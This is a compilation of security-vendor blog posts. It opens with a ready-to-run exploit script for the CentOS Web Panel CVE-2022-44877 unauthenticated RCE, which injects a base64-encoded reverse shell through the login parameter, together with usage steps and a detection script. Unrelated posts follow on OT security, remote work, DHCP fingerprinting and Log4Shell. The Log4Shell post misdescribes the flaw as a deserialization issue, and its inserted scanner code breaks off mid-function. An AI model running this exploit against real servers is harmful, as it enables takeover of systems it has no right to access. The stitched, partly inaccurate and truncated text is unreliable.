Unique exploit: CVE-2022-44877 Exploitation Tool

Here is the exploitation script for the CentOS Web Panel 7 (CWP) unauthenticated RCE, CVE-2022-44877.

The script from here:

https://github.com/mhzcyber/CVE-Analysis/blob/main/CVE-2022%E2%80%9344877/CVE-2022-44877Exploit.sh

How to use the exploitation script:

Run listener:

Make the script executable:

chmod +x CVE-2022-44877Exploit.sh

Run the script:

./CVE-2022-44877Exploit.sh https://192.168.1.108:2031/ root 192.168.1.103 9001

Now we received a connection:

You can watch the exploitation script video here:

https://youtu.be/dtrwrCaE7d8

Code Explanation:

#!/bin/bash

function help {
echo "[-] USAGE: $0 Target_URL Target_username LHOST LPORT"
echo "[-] Example: $0 https://192.168.1.108:2031/ root 192.168.1.100 9001"
exit 1
}

function exploit {
target_url=$1
target_un=$2
lhost=$3
lport=$4

payload="sh -i >& /dev/tcp/${lhost}/${lport} 0>&1"
payload_base64=$(echo -n ${payload} | base64)

target_ip=$(egrep -o '([0-9]{1,3}[.]){3}[0-9]{1,3}' <<< ${target_url})

echo $target_ip

port=$(echo ${target_url} |  grep -oP ':\K\d+')

echo $port

curl -i -s -k -X $'POST' \
-H $'Host: '${target_ip}':'${port} \
-H $'Content-Type: application/x-www-form-urlencoded' \
--data-binary $'username='${target_un}'&password=test&commit=Login' \
-g ${target_url}'login/index.php?login=$(echo${IFS}'${payload_base64}'${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash)'

}

if [[ $# -eq 4 ]]; then
exploit "$1" "$2" "$3" "$4"
else
help
fi

This script has two main functions: help and exploit.

The help function is called if the user does not provide the correct number of arguments when running the script. It displays usage information and an example of how to run the script.

The exploit function takes four arguments: the target URL, the target username, the local host IP address, and the local port number. It works as follows:

  • The script defines the payload, which is a command that creates a reverse shell.
  • The payload is then encoded in base64.
  • It then extracts the target IP address and port number from the URL,
  • and uses the curl command to send an HTTP POST request to the target with the payload in the login= parameter.
  • The payload is executed on the target server by base64-decoding it first and then running the resulting command in bash. As the curl line shows, the request wraps the encoded payload in $( ... ) command substitution and uses ${IFS} in place of spaces.
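
On the defending side, the request this script sends leaves a distinctive trace: a POST to login/index.php whose login= parameter carries $( ... ) command substitution with ${IFS} in place of spaces. The following is an added example, not part of the original script or post, that flags such requests in web access logs; the combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# One access-log line in combined log format (the format is an assumption).
LINE_RE = re.compile(
    r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Everything after "login=" in the query string, other parameters included.
LOGIN_RE = re.compile(r"(?:^|&)login=(?P<value>.*)", re.S)

SEP = r"(?:\s|\$\{?IFS\}?)"  # a space, or $IFS / ${IFS} standing in for one
SHELL_MARKERS = {
    "command substitution": re.compile(r"\$\(|`"),
    "IFS used as separator": re.compile(r"\$\{?IFS\}?"),
    "base64 decode": re.compile(r"base64" + SEP + r"+(?:-d|--decode)\b"),
    "pipe into a shell": re.compile(r"\|" + SEP + r"*(?:ba|da|z|k)?sh\b"),
}

# Constructed sample lines; the addresses are documentation ranges and the
# encoded payload is replaced by a placeholder.
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Jan/2023:10:00:01 +0000] '
    '"POST /login/index.php?login=failed HTTP/1.1" 200 4312',
    '198.51.100.7 - - [05/Jan/2023:10:02:17 +0000] '
    '"POST /login/index.php?login=$(echo${IFS}PLACEHOLDER_BASE64${IFS}|'
    '${IFS}base64${IFS}-d${IFS}|${IFS}bash) HTTP/1.1" 302 0',
    '198.51.100.8 - - [05/Jan/2023:10:03:40 +0000] '
    '"POST /login/index.php?login=%24%28echo%24%7BIFS%7DPLACEHOLDER_BASE64'
    '%24%7BIFS%7D%7C%24%7BIFS%7Dbase64%24%7BIFS%7D-d%24%7BIFS%7D%7C'
    '%24%7BIFS%7Dbash%29 HTTP/1.1" 302 0',
    '203.0.113.5 - - [05/Jan/2023:10:05:02 +0000] '
    '"GET /index.php?page=about HTTP/1.1" 200 1024',
]


def decode_fully(text, rounds=3):
    """Strip up to `rounds` layers of percent-encoding."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def inspect_line(line):
    """Return a finding for a login request carrying shell syntax, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    raw_path, _, raw_query = m.group("target").partition("?")
    if not decode_fully(raw_path).lower().endswith("login/index.php"):
        return None
    login = LOGIN_RE.search(decode_fully(raw_query))
    if not login:
        return None
    value = login.group("value")
    hits = [name for name, rx in SHELL_MARKERS.items() if rx.search(value)]
    if not hits:
        return None
    return {"client": m.group("client"), "method": m.group("method"),
            "markers": hits, "value": value[:120]}


def scan(lines):
    """Inspect every line and keep the findings."""
    return [finding for finding in map(inspect_line, lines) if finding]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["client"], finding["method"], ", ".join(finding["markers"]))
```

A hit means the request was attempted, not that it succeeded; correlate it with outbound connections from the panel host around the same timestamp.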

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Topia
TOPIA is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.

Securing Your Plant Without Shutting It Down: Navigating the Intersection of IT and OT

If one of your organization’s goals for 2023 is to implement a robust OT/ICS cyber security solution (and here’s why it absolutely should be, even if budgets are a little tight!) you may need a little help wading through the plethora of options, making a plan, and selling it to your CISO and board. There are many solutions being marketed out there, and many organizations willing to offer advice.  SCADAfence recently published a vendor-agnostic guide to choosing an OT Cyber Security solution that details why OT cyber security differs from IT cyber security and what you need to know to choose the solution that’s best for your organization. In this post, we’ll delve deeper and explore why a complete integration is so important. The U.S. National Institute of Standards and Technology (NIST) also released a draft version of a detailed technical guide to implementing OT security, with the final edition expected later this year. We suggest you download and read that as well. One important thing to remember is that even if you don’t have a complete OT security solution at the moment, you still are probably not starting from scratch. Enter the so-called expert from IT.

Integration Between OT and IT Is Essential

As we discovered recently on reddit, every control system engineer has a horror story to share about an IT guy who showed up on the floor of the manufacturing facility with a poorly thought out plan to install or upgrade a cyber security solution. They proceed to scan every device on the OT network with a tool not quite designed for the job and leave a disaster in their wake. Machines shut down. Production lines halted. Productivity out the window. Fingers pointed directly at the OT engineers. We understand why most OT engineers would prefer to keep IT experts out of the factory, and back in the office, where they belong. But the fact is, OT networks require cyber security protection too. (And because a cyber attack in the OT world risks harming physical safety, not just data, the need is actually higher.) However, as IT and OT systems become increasingly connected in functionality, it’s important to ensure that their cyber security solutions are well-integrated as well. IT systems are usually more mature, based on common operating systems such as Windows OS or Linux, and have more options available. OT systems, on the other hand, are often more fragile and built on custom software, but are more critical to an organization’s mission. Therefore, as much as the OT teams might prefer to keep the IT teams out of their workspace, it is important for them to work together. Make sure roles and responsibilities are well-defined and it’s clear who holds final accountability for making sure your facility is secure.

Identify Your Specific Use Case

Before selecting an OT cyber security vendor, it’s essential to prepare and validate a clear list of IT integration use cases, and ensure that your chosen vendor is able to meet those needs. A sound and complete integration between OT and IT security solutions should accomplish several things. First, it should allow for the flow of information between the two systems. This means that the OT team can receive alerts and notifications from the IT system, and vice versa. Second, a seamless integration should allow for forensic analysis to be conducted across both systems if needed. Third, remote users that are authenticated by the IT systems may need access to OT systems as well. Therefore, a proper solution will allow a way for users logging on remotely to get the access they need at the correct level of authorization. This means that the solution should integrate seamlessly with other tools that are already in place. For example, SCADAfence integrates with a number of different security vendors, such as Rapid7, Keysight, and Secureworks. An open API that allows for maximum flexibility is ideal, as it allows you to tailor the integration to your specific use case rather than being limited to pre-set integrations that may not meet your needs.

Increased Visibility And Other OT Needs

In addition to the OT/IT integration, there are many other things to look for in an OT solution, including, yes, the ability to passively scan the network to create a detailed inventory of every device without causing damage and shutting down the network. Other must-haves include quick installation time, low false positive rates, and tailored risk alerts. These are all covered in detail in the guide as well. So, when the CISO, IT person or other member of senior management tells you they want to bring in a cyber security expert, instead of tossing them out on their head and bolting the door, invite them in, be prepared, and talk about how best to work together. To get more advice and information about choosing an OT cyber security solution, download our complimentary guide.

About SCADAfence
SCADAfence helps companies with large-scale operational technology (OT) networks embrace the benefits of industrial IoT by reducing cyber risks and mitigating operational threats. Our non-intrusive platform provides full coverage of large-scale networks, offering best-in-class detection accuracy, asset discovery and user experience. The platform seamlessly integrates OT security within existing security operations, bridging the IT/OT convergence gap. SCADAfence secures OT networks in manufacturing, building management and critical infrastructure industries. We deliver security and visibility for some of world’s most complex OT networks, including Europe’s largest manufacturing facility. With SCADAfence, companies can operate securely, reliably and efficiently as they go through the digital transformation journey.

Why we chose to be a fully remote company (and how we make it work)

At runZero, a physical office isn’t what unites us–it’s our mission that brings us together.

We are proud of the fact we are a 100% remote team, distributed across 10 states. From software engineers to product developers, we aim to help organizations keep their networks secure–all from the comfort of our own homes.

People often ask me why we chose to be a fully remote company from the beginning. As we look to grow, I wanted to take time to elaborate on why we made this choice, the benefits to our company and employees, and how we cultivate our culture without a shared office space.

Why remote-only was the right choice

I joined runZero in late 2020, two years after our founder, HD Moore, started the company. We were in the middle of a pandemic, and our conversations quickly turned to the practicalities of running a startup remotely. Because the whole world was still working remotely due to the pandemic, opening an office just didn’t make sense at the time.

HD felt that he could run the engineering side of things remotely from Austin, TX, and he asked if I needed a sales office in Boston. With all the tools at our fingertips today, I knew I could accomplish most tasks remotely.

My perspective was that working in an office is only important for certain meetings and social interactions. It’s not required for individual, focused work (unless you have a lot of people in your apartment and need a quiet place to work, but even then, there are other options to meet that need such as coworking spaces).

All that to say: my immediate instinct was runZero could run very well remotely.

Hybrid work is the worst of both worlds

Hybrid usually means employees are in the office around 3 days a week. Employers usually allow people to have some level of freedom over the days they choose to be in the office, so they still get the flexibility from remote work. As a result, it’s difficult to get everyone at the office at the same time.

These hybrid models work in theory, but to me, they seem to bring out the worst parts of each working environment. You still feel isolated (a challenge of remote work), even though you are technically back in the office. You’re able to meet with your colleagues in-person, but never at the same time. So what’s the point?

Hybrid models are also not conducive to productive meetings. Trying to optimize an audio and video setup for in-person and remote meetings is an exercise in futility. One person is drawing on a whiteboard you can barely see, and another is struggling to hear what’s going on through the dreaded Polycom.

Meanwhile, if everyone is on a Zoom call, we can all hear and see each other simultaneously and clearly. Video-conferencing software has improved drastically over the last few years and video and audio quality is heads and tails above typical conferencing options, which allows for efficient and productive meetings.

On a personal level, this is how I prefer to work. I don’t have to sit in a car for two hours a day to get to an office and to run between different meeting rooms at different times. I can prepare healthy meals and pop in a load of laundry in between writing up strategic reports.

Beyond that, however, there are tangible benefits to the company itself that made our decision to become 100% remote an easy one.

Remote work attracts the best talent and gives us an edge over the competition

As things slowly returned to normal in 2021, more companies began to ask employees to come back to the office. However, not all of them wanted to return.

We saw this as a competitive advantage for us. We offered a workplace that allowed for talented individuals to continue working independently, while also being part of a team that shared their values. The certainty that we were never going to ask people to come to an office was a big plus for a lot of people.

In turn, the talent pool we could choose from actually broadened. Now we could pick up people from companies that wanted employees to return when they didn’t want to. We weren’t restricted to a single city either. We could attract quality candidates nationwide and hire, onboard, and train them quickly and efficiently. That’s a cost advantage that we can reinvest in the company.

As a result, our employees have also shared feedback that they are able to maintain a better work-life balance, while also feeling connected to the company mission.

Staying Connected While Apart: How We Cultivate a Company Culture

Admittedly, a formidable challenge to not having a physical workplace is missing out on what I would call ‘water cooler chatter’: those impromptu conversations. Sometimes they were about work, other times about our personal lives. These moments are crucial to helping teams feel connected to a shared experience.

However, company culture is so much more than incidental conversations around the office. It’s about people feeling like they are truly a part of something, and that kind of culture is cultivated thoughtfully and holistically.

First and foremost, understanding our cultural values was key to helping us build a remote culture – or any company culture. Then, our focus shifted to understanding how we help connect people to those values, help people develop 1-on-1 relationships, and foster interpersonal communication that builds the fabric of the company.

Let’s talk about some practical ways we foster and maintain company culture across time zones and locations.

Practical Ways we Manage Culture (and the tools we use!)

We still see the value of in-person interactions. We choose differently.

Our approach to communication is if it involves simply transferring knowledge or information, it can be accomplished virtually (through Slack, Zoom, or recorded video).

For example, we host monthly virtual town halls, which all employees and executives attend. Town halls are an important way to keep information flowing. We are open about our standing as a company, where we are going, and what’s coming next. Transparency is an even higher priority when you operate as a 100% remote company, and that’s why it’s one of our core values.

To set the tone for our time together, we usually kick off each meeting with a soundtrack. One time, after we closed a big customer in the telecommunications space, we played Lady Gaga’s “Telephone”. We take our work seriously, but we also like to have a little fun.

Since our town halls focus mainly on sharing information, they can be virtual. Meanwhile, we reserve in-person events for culture-building activities and interactions.

For example, we had our first ever company-wide meeting in-person in October 2022 in San Diego, an event we plan to host yearly. We had two to three hours of scheduled time during the day that involved sitting in a room poring over information. The rest of each day was dedicated to team building exercises and common activities to foster lots of unstructured interactions. We also plan to meet up a second time each year for a go-to-market kickoff.

We use communication tools effectively and creatively

As you can expect, we use Slack for work-related communications, including weekly one-on-ones and asynchronous communications on important work matters.

We also use it as a way for everyone to connect. Lots of people check in with each other in the morning on the #casual-random Slack channel. We have a channel for foodies, movies, books, pets, kids, and many other channels to help employees connect who live in the same geographical area and sometimes get together in-person.

When you work remotely, almost every interaction is scheduled, and it can start to feel too structured. To help with this, we use Donut.com; it picks two random people within the company’s Slack that haven’t chatted in a while and pairs them up that month for a 30 minute one-on-one meeting. This meeting has no specific business purpose; it is simply there to mimic–to some degree–those casual water cooler conversations. This tool is a great way to make those types of conversations happen, and we have received positive feedback from employees who have built relationships this way.

Another tool we have used is called Gather.Town. You walk around a room that looks like an 8-bit game. As you wander, you can hear and see people standing near you (virtually), similar to a cocktail party. It’s a fun, gamified way to have a sort of happy hour with colleagues.

Our Head of People, Madison Smiser, has also been organizing company coffees (some virtual, some in-person where possible), show and tells, and breakout groups. We certainly don’t have it all figured out, but we are always listening to feedback and trying out new things. We know that socializing is an important part of building culture inside a company (remote or not).

Is going remote the right choice for you?

Truthfully, remote work is not for everyone, and that’s okay. Some people don’t have the physical workspace or environment to work remotely, while others work in service-based industries or manufacturing where it’s not a feasible option.

There are certainly challenges to running a remote company, but at the end of the day it can contribute positively to employee satisfaction and culture. There is something fascinating about the level of trust that binds a team together when everyone works remotely. It’s a benefit that comes from being in completely different places and, yet, still feeling connected.

If you’re interested in joining a fully remote workplace that’s building culture in creative ways, check out our Careers page.

About runZero
runZero, a network discovery and asset inventory solution, was founded in 2018 by HD Moore, the creator of Metasploit. HD envisioned a modern active discovery solution that could find and identify everything on a network–without credentials. As a security researcher and penetration tester, he often employed benign ways to get information leaks and piece them together to build device profiles. Eventually, this work led him to leverage applied research and the discovery techniques developed for security and penetration testing to create runZero.

Strengthening IoT Security with Cloud-Native DHCP Listening

Enhanced IoT Fingerprinting & Security with Cloud-Native DHCP Listening

More Like the Internet of Everything

With the explosion of new devices connecting to the internet, IoT (or, the Internet of Things) really might as well be called IoE (or, the Internet of Everything.) The use cases for always-connected devices span across industries – from facilities that can now better manage energy usage according to peak customer traffic, and medical devices that can adjust medication levels in seconds, to retail warehouses that can track inventory down to the last widget. It’s undeniable that IoT has been a game-changer.

That’s not to say, however, that IoT does not present some unique challenges – specifically for network security professionals.

Who Are You?

The devices themselves tend to run on extremely lean operating systems, which means they don’t run typical monitoring protocols like SNMP. There’s also no possibility of installing extra software like agents. They’re designed to be easy to set up; just point them at an internet connection, which means any user can add an IoT device.

This creates an especially tough situation for IT administrators. After all, an essential part of zero trust security is knowing what is on your network, which means you need to make sure operating systems and firmware are patched and up-to-date to close the gap on any known vulnerabilities. But how can you know what’s on your network if the devices don’t report back specific identification in any way?

This problem has become so common it has a name – “Shadow IoT” – and it’s so prevalent that 80% of IT leaders found devices on their network they didn’t know about.

IoT Fingerprinting to the Rescue!

To combat this, several companies that make security tools like Network Access Control software have begun offering IoT Fingerprinting. This is a way to gather information about IoT devices like model, OS or Firmware, and manufacturer without requiring the devices to report in. While an absolute game changer for helping secure these devices, it is not without its challenges.

The biggest issue is that there is no real standard across devices – most don’t support Simple Network Management Protocol (SNMP) or Windows Management Instrumentation (WMI). Some devices support Universal Plug & Play (UPnP) or Bonjour, but typically you only find that on consumer devices like a Roku or an AppleTV. Some Cisco devices support CDP (Cisco Discovery Protocol), but that doesn’t cover other vendors; some may use LLDP instead (Link Layer Discovery Protocol) but typically you will find that only on phones, video conferencing equipment, and commercial IP surveillance cameras.

Port scanning via Nmap & TCP has more drawbacks – it scales very poorly. Also, with increased pressure on IoT manufacturers to pay more attention to security, more and more devices are being shipped with all ports turned off. And of course, the most basic firewall will raise alarms when a port scan is detected.

MAC addresses will get you some information, but they pose some challenges too. The first six hexadecimal digits of a MAC address are called the OUI and they identify the manufacturer. This is useful, but also not super accurate in the sense that if you find an HP device on your network, that does little to tell you what exactly it is. It also does not tell you any information about operating systems or firmware.

DHCP at first seems like a great option – when a device connects to a network, its first step is typically to request an IP from a DHCP server. During the DORA process (Discovery, Offer, Request, Acknowledge) much information is passed back and forth, including information to fingerprint the device. Many enterprise switches support a process called DHCP Gleaning, where the switch listens for DHCP requests on switchport interfaces; the information is then captured as device sensor data and sent along with RADIUS accounting info.
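
What that fingerprinting information looks like inside a DHCP request, as an added example that is not Portnox code or part of the original article: the parser below reads a BOOTP/DHCP message and pulls out the client MAC and OUI together with the options usually relied on for fingerprinting. The option numbers (53, 12, 60, 55) come from RFC 2132 and are not named on the original page; the function names and the sample DISCOVER packet are constructed for illustration.

```python
import struct

MAGIC_COOKIE = b"\x63\x82\x53\x63"   # marks the start of the DHCP options field
MESSAGE_TYPES = {1: "DISCOVER", 2: "OFFER", 3: "REQUEST", 4: "DECLINE",
                 5: "ACK", 6: "NAK", 7: "RELEASE", 8: "INFORM"}


def parse_options(buf):
    """Walk the type-length-value option list and return {code: value bytes}."""
    options, i = {}, 0
    while i < len(buf):
        code = buf[i]
        if code == 0:            # pad byte, no length field
            i += 1
            continue
        if code == 255:          # end of options
            break
        if i + 1 >= len(buf):
            raise ValueError("truncated option header")
        length = buf[i + 1]
        value = buf[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError(f"option {code} runs past the end of the packet")
        options[code] = options.get(code, b"") + value  # repeated options concatenate
        i += 2 + length
    return options


def as_text(value):
    """Decode an option value as ASCII, or return None when it is absent."""
    return value.decode("ascii", "replace") if value else None


def fingerprint(packet):
    """Extract the fields of a DHCP message that help identify the client."""
    if len(packet) < 240 or packet[236:240] != MAGIC_COOKIE:
        raise ValueError("not a DHCP message")
    hlen = packet[2]
    if hlen > 16:
        raise ValueError("bad hardware address length")
    mac = packet[28:28 + hlen]            # chaddr field of the fixed header
    opts = parse_options(packet[240:])
    mtype = opts.get(53)
    return {
        "mac": ":".join(f"{b:02x}" for b in mac),
        "oui": mac[:3].hex(),                                 # manufacturer prefix
        "message_type": MESSAGE_TYPES.get(mtype[0], "UNKNOWN") if mtype else None,
        "hostname": as_text(opts.get(12)),
        "vendor_class": as_text(opts.get(60)),
        # The order of requested parameters differs between DHCP client stacks.
        "param_request_list": ",".join(str(b) for b in opts.get(55, b"")),
    }


def build_sample():
    """Constructed DHCPDISCOVER from an imaginary IP camera."""
    mac = bytes.fromhex("02005e102030")   # locally administered, made-up address
    header = struct.pack("!BBBBIHH4s4s4s4s16s64s128s",
                         1, 1, 6, 0, 0x1234ABCD, 0, 0x8000,
                         b"", b"", b"", b"", mac, b"", b"")

    def opt(code, value):
        return bytes([code, len(value)]) + value

    options = (opt(53, b"\x01") + opt(12, b"cam-lobby-01")
               + opt(60, b"udhcp 1.30.1")
               + opt(55, bytes([1, 3, 6, 12, 15, 28, 42])) + b"\xff")
    return header + MAGIC_COOKIE + options


if __name__ == "__main__":
    for key, value in fingerprint(build_sample()).items():
        print(f"{key}: {value}")
```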

The problem here is that not all switches support DHCP Gleaning. For the ones that don’t, how do you get the information collected by the DHCP server to your network access control software to do the actual fingerprinting? Some solutions have you install an on-prem DHCP forwarder, which signs your IT team up to deal with deploying and maintaining yet another server, upgrades, patches, etc. Even worse, this separate forwarder creates overhead on your network that may impact your users and sensitive traffic.

So it may seem that all hope is lost and there’s no reliable way to accurately fingerprint all your IoT devices, but there’s great news coming.

Portnox’s DHCP Listener Heads to the Cloud

Keep all the magic of a cloud-based solution – vendor agnostic, no maintenance, no upgrades, no worries – AND get the most accurate fingerprinting of all your IoT devices as part of your comprehensive zero-trust solution!

You can easily configure your network devices to send the data your DHCP server already gathers throughout the course of handing out IP Addresses to the Portnox SaaS DHCP listener.

All you need to enable is a layer 3 device on the same subnet as the devices you want fingerprinted, that is NOT also acting as a DHCP server. You will need to configure the DHCP helper, which will forward this information to us. Most devices support using a DHCP helper – in fact, most devices support running multiple, so no need to sacrifice anything in your current architecture. The helper will forward DHCP and BOOTP broadcasts on directly connected subnets and relay them to the Portnox DHCP listener on port 67.

If you have bandwidth considerations, you can lay them to rest – DHCP is a very lightweight protocol, consuming less than 350 bytes per request on average. Since we are not making DHCP offers, the only bandwidth used is for the clients’ DHCP requests that are forwarded.

So let’s say you have 500 clients. A DHCP lease is typically 24 hours, with clients renewing at 12 hours. That means you’d spend 175 kilobytes of total data every 12 hours…even a 28.8 baud modem could handle that request.

We use this formula to calculate bandwidth:

(((total number of DHCP clients × 350 bytes) × 2 for 24 hours) × 8 to convert to bits) / 86400 seconds in a day

In Excel, the equivalent formula would read: =(((500*350)*2)*8)/86400

This first-of-its-kind SaaS DHCP listener is easy to set up, and opens a whole new world of accurate fingerprinting for IoT Devices – click here to get started!

About Portnox
Portnox provides simple-to-deploy, operate and maintain network access control, security and visibility solutions. Portnox software can be deployed on-premises, as a cloud-delivered service, or in hybrid mode. It is agentless and vendor-agnostic, allowing organizations to maximize their existing network and cybersecurity investments. Hundreds of enterprises around the world rely on Portnox for network visibility, cybersecurity policy enforcement and regulatory compliance. The company has been recognized for its innovations by Info Security Products Guide, Cyber Security Excellence Awards, IoT Innovator Awards, Computing Security Awards, Best of Interop ITX and Cyber Defense Magazine. Portnox has offices in the U.S., Europe and Asia. For information visit http://www.portnox.com, and follow us on Twitter and LinkedIn.

Why Log4Shell Remains a Major Risk for Corporate Networks.

Log4Shell is Still Lurking.

What Does it Mean for Corporate Networks?

What is Log4Shell & What Does it Affect?

In December 2021, the Log4j vulnerability, also known as Log4Shell, was made public. Log4j is a logging utility for Java that allows developers to output log messages from their applications to various destinations, such as the console, a file, or a database. Like any software, log4j is susceptible to vulnerabilities that can be exploited by attackers. Logging tools are used by developers to keep track of activity within a certain application.

To take advantage of Log4Shell, all attackers have to do is trick the system into logging a unique piece of code. They can then take over their target’s computer and install malware or launch other types of cyber attacks.

Log4j’s handling of serialized data is one area where it might be vulnerable. An attacker may be able to insert harmful code into serialized data supplied to the log4j library in some versions of log4j. The injected code may be executed if the log4j library deserializes this data, which might provide the attacker access to the system without authorization or enable them to carry out other nefarious deeds.

A year later, the issue still poses great risks, as was noted in an announcement by both the FBI and the Cybersecurity and Infrastructure Security Agency on a network attack by Iranians at a federal civilian executive branch agency. With the relentless rise of attacks and vulnerabilities dominating the cybersecurity landscape, organizations are coping with a compound threat: the vulnerabilities from prior years that may not have been sufficiently addressed as well as the new ones that surface every year.

How Does Log4Shell Affect Corporate Networks?

What makes the Log4j vulnerability even more dangerous is how ubiquitous the Log4j 2 library is. It can be found in large and small services as well as significant platforms like VMware and Amazon Web Services. Organizations across the industry have incorporated Apache Log4j 2 into a variety of applications because it is one of the most used logging frameworks on the internet. This includes well-known cloud providers like Twitter and Stream as well as platforms like Apple, Google, Microsoft, and Cloudflare.

The vulnerability’s impact is amplified in particular by how simple it is to exploit. The Log4j library manages how code and data are logged by applications. The flaw gives an attacker access to a string, which they can use to fool the application into requesting and executing malicious code they have control over. Attackers can thereby remotely take control of any internet-connected service that makes use of specific versions of the Log4j library, regardless of where in the software stack it is located.

The subject is pertinent to more discussions about the software supply chain and how it is more challenging to find and fix vulnerable code since many firms do not have a complete accounting of all the software they use in their systems. However, even if a company has a record of every piece of software it has purchased or installed, those programs may still contain other software components that the end user isn’t precisely aware of and didn’t intentionally choose. Because of this intricate web of dependencies between the impacted platforms and services, patching can be a challenging and time-consuming process.

Attackers are still actively using Log4Shell everywhere they can, from criminal hackers looking for a way into targets’ systems to attackers with the support of the Chinese and Iranian governments who use the exploit in their espionage operations. Moreover, the latest analysis released by Tenable on Wednesday revealed that the issue still exists as of October 1, 2022, and that 72% of organizations are still exposed to Log4Shell. Some companies that first mitigated the vulnerability are included in that figure. Tenable conducted the study while gathering information from more than 500 million tests.

How can Companies Mitigate This Vulnerability?

Any company can fall victim to Log4Shell. Previous research and data analysis suggest the importance of continually assessing enterprise environments for the flaw, as well as other critical vulnerabilities.

Companies should update their own applications and infrastructure that use Log4j as well as third-party applications immediately. Corporate networks need enhanced security solutions that can immediately and automatically identify vulnerable systems and their dependencies, and help you prioritize the most critical systems to update first.

Prioritizing Java processes that are accessible via public networks and have the potential to leak critical information to malicious intruders is the most effective strategy for solving this problem. Throughout this process, it is important to keep a list of all known and suspected susceptible assets and what is being done with them.

Since malicious cyber actors may compromise an asset and then patch it to cover their tracks, it is crucial to keep track of patching. In order to determine whether a threat actor may have patched an asset, organizations should maintain a detailed record of the susceptible assets they have patched.

Even with proper record keeping, it is important to verify the success of the mitigation. Use the appropriate tools and techniques to scan the patched asset. Utilize different techniques to confirm that the mitigation was properly implemented while keeping a careful eye on the asset. Look out for updates from vendors to the asset’s software.

For information on known affected products and patches, check CISA’s GitHub page. CISA will keep the repository updated when vendors issue patches.

Given the widespread exploitation of this vulnerability, it is also advisable to conduct hunt procedures. Organizations should assume that their assets have been compromised in order to exercise their incident response procedures. This should involve treating assets as compromised and inspecting and monitoring accounts across the enterprise that exist on or connect to assets that use Log4j. These are among the ways that corporate networks can be protected from the vulnerability.

It goes without saying that all firewalls and intrusion detection systems should be updated. The patches could filter or block LDAP and RMI traffic attempting to reach malicious LDAP servers. It is also useful to implement general hygiene practices like multi-factor authentication and strict VPN policies. Finally, it was noted that a design flaw in the JNDI Lookup plugin is primarily to blame for this critical vulnerability. With the JndiLookup class disabled, the logger is unable to take action based on data found in the log. JNDI is, however, disabled by default in version 2.16.0 of Log4j.
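The inventory and verification steps above, as an added example (not from the original article or any vendor tool): a Python scanner that opens JAR/WAR/EAR files, including nested ones, finds `log4j-core`, reads its version, checks whether `JndiLookup.class` is still present, and lists remediated copies that are missing from your own patch record. The status labels, the ledger format and the sample archives are constructed for illustration; the 2.16.0 threshold is the one the article cites.

```python
import io
import re
import zipfile
from pathlib import Path

# Entry names inside a log4j-core JAR (Log4j 2.x package layout).
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
JNDI_OFF_BY_DEFAULT = (2, 16, 0)     # threshold taken from the article
MAX_DEPTH = 4                        # assumption: nesting limit for fat JARs
MAX_NESTED_BYTES = 64 * 1024 * 1024  # assumption: skip oversized nested entries

def parse_version(props_text):
    """Return (major, minor, patch) from a Maven pom.properties, or None."""
    m = re.search(r"^version=(\d+)\.(\d+)(?:\.(\d+))?", props_text, re.M)
    return tuple(int(g or 0) for g in m.groups()) if m else None

def classify(version, has_jndi):
    """Status labels are this example's own, not an official taxonomy."""
    if version is None:
        return "review"            # shaded/repackaged copy, version unknown
    if version >= JNDI_OFF_BY_DEFAULT:
        return "jndi-off-by-default"
    return "needs-update" if has_jndi else "class-removed"

def scan_archive(data, label, depth=0, findings=None):
    """Inspect one archive (as bytes) and any archives nested inside it."""
    findings = [] if findings is None else findings
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings            # not a readable archive; nothing to report
    with zf:
        names = set(zf.namelist())
        has_jndi = JNDI_CLASS in names
        if has_jndi or POM_PROPS in names:
            version = None
            if POM_PROPS in names:
                text = zf.read(POM_PROPS).decode("utf-8", "replace")
                version = parse_version(text)
            findings.append({"path": label, "version": version,
                             "jndi_lookup": has_jndi,
                             "status": classify(version, has_jndi)})
        if depth < MAX_DEPTH:
            for info in zf.infolist():
                nested = info.filename.lower().endswith(ARCHIVE_SUFFIXES)
                if nested and info.file_size <= MAX_NESTED_BYTES:
                    scan_archive(zf.read(info), f"{label}!/{info.filename}",
                                 depth + 1, findings)
    return findings

def scan_tree(root):
    """Scan every archive under a directory; returns a list of findings."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in ARCHIVE_SUFFIXES:
            scan_archive(path.read_bytes(), str(path), findings=findings)
    return findings

def unrecorded_fixes(findings, patch_ledger):
    """Copies that look remediated but are absent from our own patch record."""
    # The article warns that an intruder may patch an asset to cover their
    # tracks, so a fix nobody on the team logged deserves a closer look.
    fixed = ("class-removed", "jndi-off-by-default")
    return [f["path"] for f in findings
            if f["status"] in fixed and f["path"] not in patch_ledger]

def make_jar(entries):
    """Build a small in-memory archive from {name: bytes} (constructed data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()

def demo():
    """Constructed sample: one fat JAR bundling three log4j-core copies."""
    # Version strings and class bytes below are sample values, not real JARs.
    old = make_jar({POM_PROPS: b"version=2.14.1\n", JNDI_CLASS: b"\xca\xfe"})
    stripped = make_jar({POM_PROPS: b"version=2.14.1\n"})
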